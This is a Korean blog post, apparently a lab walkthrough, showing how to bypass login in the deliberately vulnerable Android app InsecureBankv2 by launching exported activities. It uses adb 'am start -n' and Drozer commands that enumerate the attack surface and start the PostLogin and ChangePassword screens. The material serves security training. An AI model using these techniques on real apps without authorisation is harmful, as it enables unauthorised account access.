Self-Improvement
[InsecureBankv2] Login Bypass (exported=true, adb shell am start -n, Drozer) 본문
AOS/InsecureBankv2
[InsecureBankv2] Login Bypass (exported=true, adb shell am start -n, Drozer)
JoGeun 2021. 12. 29. 11:03Login Bypass
AndroidManifest.xml 파일에는 액티비티가 선언되어 있으며 이때 exported 설정값이 true이거나 <intent-filter> 태그 안에 exporter 설정이 안되어 있으면 기본값으로 true로 설정되는데 이때 해당 액티비티를 권한 없이 요청하여 접근할 수 있다.
ADB
ADB 명령어를 이용하여 해당 액티비티를 요청하면 된다.
adb shell am start -n com.android.insecurebankv2/.PostLogin //
Drozer
Drozer로의 방법은 아래의 명령어를 수행하면 된다.
adb forward tcp:31415 tcp:31415
drozer console connect
// 취약점 출력
run app.package.attacksurface com.android.insecurebankv2
// activity 정보 출력
run app.activity.info -a com.android.insecurebankv2
// activity 요청
run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.ChangePassword
'AOS > InsecureBankv2' 카테고리의 다른 글
[InsecureBankv2] Application Backup Enabled (abe.jar) (0) | 2021.12.29 |
---|---|
[InsecureBankv2] Insecure Storage of Credentials (0) | 2021.12.29 |
[InsecureBankv2] Developer Login (0) | 2021.12.29 |
[InsecureBankv2] Hidden Create User Button for Admins (0) | 2021.12.29 |
InsecureBankv2 환경 구축 (0) | 2021.12.28 |